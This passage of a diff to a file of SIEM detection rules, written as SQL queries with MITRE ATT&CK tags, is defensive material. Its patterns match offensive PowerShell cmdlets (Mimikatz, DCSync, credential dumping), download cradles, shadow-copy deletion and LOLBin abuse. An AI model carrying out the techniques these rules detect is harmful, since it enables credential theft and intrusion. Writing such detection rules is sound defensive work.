OTR (Open Threat Research)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": 
"posh_pc_wsman_com_provider_no_powershell.yml" }, { - "title": "Active Directory Group Enumeration With Get-AdGroup", - "id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", - "status": "experimental", - "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdGroup %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adgroup.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Service Registry Permissions Weakness Check", - "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "title": "Netcat The Powershell Version", + "id": "c5b20776-639a-49bf-94c7-84f912b91c15", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at 
Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_acl_service.yml" + "filename": "posh_pc_powercat.yml" }, { - "title": "Use Remove-Item to Delete File", - "id": "b8af5f36-1361-4ebe-9e76-e36128d947bf", - "status": "test", - "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", - "author": "frack113", + "title": "Nslookup PowerShell Download Cradle", + "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "status": "experimental", + "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", + "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '%HKCU:\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%HKLM:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" ], - "filename": "posh_ps_remove_item_path.yml" + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" }, { - "title": "Active Directory Computers Enumeration with Get-AdComputer", - "id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "title": "Suspicious PowerShell Download", + "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "status": "experimental", - "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%Get-AdComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adcomputer.yml" + "filename": "posh_pc_susp_download.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "title": "Alternate PowerShell Hosts", + "id": "d7326048-328b-4d5e-98af-86e84b17c765", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. 
All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT ((HostApplication LIKE 'powershell%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\') OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "posh_pc_alternate_powershell_hosts.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "title": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", + "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' 
ESCAPE '\\')" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_pressanykey_lolbin_execution.yml" }, { - "title": "Suspicious Get Local Groups Information - PowerShell", - "id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "title": "Application Whitelisting Bypass via PresentationHost.exe", + "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "status": "experimental", - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "falsepositives": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_lolbin_presentationhost.yml" + }, + { + "title": "Suspicious ConfigSecurityPolicy Execution", + "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "status": "experimental", + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.001" + 
"attack.exfiltration", + "attack.t1567" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%get-localgroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Get-WMIObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Group%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_local_group_reco.yml" + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" }, { - "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", - "id": "603c6630-5225-49c1-8047-26c964553e0e", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Potential In-Memory Execution Using Reflection.Assembly", - "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "title": "Potential Arbitrary File Download Using Office Application", + "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "status": "experimental", - "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", - "author": "frack113", + "description": "Detects potential arbitrary file download using a Microsoft Office application", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\') OR OriginalFileName IN ('Excel.exe', 'POWERPNT.EXE', 'WinWord.exe')) AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" ], - "filename": "posh_ps_dotnet_assembly_from_file.yml" + "filename": "proc_creation_win_office_arbitrary_cli_download.yml" }, { - "title": "Suspicious Invoke-Item From Mount-DiskImage", - "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "title": "PUA - Adidnsdump Execution", + "id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 